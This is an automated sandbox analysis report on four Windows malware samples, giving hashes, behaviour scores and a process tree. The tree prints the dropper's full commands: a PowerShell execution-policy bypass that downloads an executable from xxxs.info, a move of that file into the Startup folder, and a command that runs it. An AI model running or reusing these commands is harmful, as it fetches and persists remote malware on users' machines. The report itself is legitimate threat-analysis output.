Overview

Static analysis score: 10

Analysis tasks (score, sample, platform):
- 10  07fb7b42fe...35.exe  windows7-x64
- 1   07fb7b42fe...35.exe  windows10-2004-x64
- 8   4fa565cc2e...af.exe  windows7-x64
- 1   4fa565cc2e...af.exe  windows10-2004-x64
- 3   949c262359...70.ps1  windows7-x64
- 3   949c262359...70.ps1  windows10-2004-x64
- 3   b3b66f7e70...62.exe  windows7-x64
- 10  b3b66f7e70...62.exe  windows10-2004-x64
Analysis (score: 10)

max time kernel: 98s
max time network: 127s
platform: windows10-2004_x64
resource: win10v2004-20241007-en
resource tags: arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
submitted: 26/12/2024, 17:54
Behavioral tasks

behavioral1
  Sample: 07fb7b42fe8d4a2125df459efd86de0f27b91b59d82b85b530c1e7c552c9e235.exe
  Resource: win7-20240903-en

behavioral2
  Sample: 07fb7b42fe8d4a2125df459efd86de0f27b91b59d82b85b530c1e7c552c9e235.exe
  Resource: win10v2004-20241007-en

behavioral3
  Sample: 4fa565cc2ebfe97b996786facdb454e4328a28792e27e80e8b46fe24b44781af.exe
  Resource: win7-20241010-en

behavioral4
  Sample: 4fa565cc2ebfe97b996786facdb454e4328a28792e27e80e8b46fe24b44781af.exe
  Resource: win10v2004-20241007-en

behavioral5
  Sample: 949c262359f87c8a0e8747f28a89cf3d519b35fbc5a8be81b2cd9e6adc830370.ps1
  Resource: win7-20240903-en

behavioral6
  Sample: 949c262359f87c8a0e8747f28a89cf3d519b35fbc5a8be81b2cd9e6adc830370.ps1
  Resource: win10v2004-20241007-en

behavioral7
  Sample: b3b66f7e70f1e1b1494677d0ed79fcc7d4901ffae53d89fd023c8b789bb0fe62.exe
  Resource: win7-20240903-en

behavioral8
  Sample: b3b66f7e70f1e1b1494677d0ed79fcc7d4901ffae53d89fd023c8b789bb0fe62.exe
  Resource: win10v2004-20241007-en
General

Target: 07fb7b42fe8d4a2125df459efd86de0f27b91b59d82b85b530c1e7c552c9e235.exe
Size: 131KB
MD5: 17eb8fa4b86a2f5ec5cb789545902181
SHA1: cb40cc63b23bc335aa095606c07b56f2d2d71bb9
SHA256: 07fb7b42fe8d4a2125df459efd86de0f27b91b59d82b85b530c1e7c552c9e235
SHA512: cce3789d6e5395f701c9ff10467c3352568f7a3cea13cfd55e6b6f1bade8f01a56a8c1a433940fa1ccdce201941788717f6d486cef40f59d2bac075eaf696573
SSDEEP: 1536:j/tSikO5ssRyJmapXRQVO6eWkYolZPt1AUvMFMQiNwRVRky3es:xSWqLQAYolZPt1oJRfky3es
Malware Config
Signatures

Blocklisted process makes network request (1 IoC)
  flow  pid   Process
  5     3444  powershell.exe

Suspicious behavior: EnumeratesProcesses (2 IoCs)
  pid   Process
  3444  powershell.exe
  3444  powershell.exe

Suspicious use of AdjustPrivilegeToken (1 IoC)
  description               pid   Process
  Token: SeDebugPrivilege   3444  powershell.exe

Suspicious use of WriteProcessMemory (10 IoCs)
  description                           pid   Process                                                                   procid_target
  PID 5056 wrote to memory of 4840      5056  07fb7b42fe8d4a2125df459efd86de0f27b91b59d82b85b530c1e7c552c9e235.exe  84
  PID 5056 wrote to memory of 4840      5056  07fb7b42fe8d4a2125df459efd86de0f27b91b59d82b85b530c1e7c552c9e235.exe  84
  PID 4840 wrote to memory of 3444      4840  cmd.exe                                                                   85
  PID 4840 wrote to memory of 3444      4840  cmd.exe                                                                   85
  PID 5056 wrote to memory of 1092      5056  07fb7b42fe8d4a2125df459efd86de0f27b91b59d82b85b530c1e7c552c9e235.exe  86
  PID 5056 wrote to memory of 1092      5056  07fb7b42fe8d4a2125df459efd86de0f27b91b59d82b85b530c1e7c552c9e235.exe  86
  PID 5056 wrote to memory of 1552      5056  07fb7b42fe8d4a2125df459efd86de0f27b91b59d82b85b530c1e7c552c9e235.exe  87
  PID 5056 wrote to memory of 1552      5056  07fb7b42fe8d4a2125df459efd86de0f27b91b59d82b85b530c1e7c552c9e235.exe  87
  PID 5056 wrote to memory of 264       5056  07fb7b42fe8d4a2125df459efd86de0f27b91b59d82b85b530c1e7c552c9e235.exe  88
  PID 5056 wrote to memory of 264       5056  07fb7b42fe8d4a2125df459efd86de0f27b91b59d82b85b530c1e7c552c9e235.exe  88
Processes (process tree; indentation shows parent/child depth)

1. C:\Users\Admin\AppData\Local\Temp\07fb7b42fe8d4a2125df459efd86de0f27b91b59d82b85b530c1e7c552c9e235.exe
   Command line: "C:\Users\Admin\AppData\Local\Temp\07fb7b42fe8d4a2125df459efd86de0f27b91b59d82b85b530c1e7c552c9e235.exe"
   PID: 5056
   - Suspicious use of WriteProcessMemory

   2. C:\Windows\system32\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c powershell -nop -exec bypass wget -uri http://xxxs.info/kaido.exe -outfile x.exe
      PID: 4840
      - Suspicious use of WriteProcessMemory

      3. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
         Command line: powershell -nop -exec bypass wget -uri http://xxxs.info/kaido.exe -outfile x.exe
         PID: 3444
         - Blocklisted process makes network request
         - Suspicious behavior: EnumeratesProcesses
         - Suspicious use of AdjustPrivilegeToken

   2. C:\Windows\system32\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c move x.exe "%APPDATA%/Microsoft/Windows/Start Menu/Programs/Startup/"
      PID: 1092

   2. C:\Windows\system32\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c cls
      PID: 1552

   2. C:\Windows\system32\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c cd "%APPDATA%/Microsoft/Windows/Start Menu/Programs/Startup/" && x.exe
      PID: 264
Network
MITRE ATT&CK Matrix
Downloads
Filesize: 60B
MD5: d17fe0a3f47be24a6453e9ef58c94641
SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82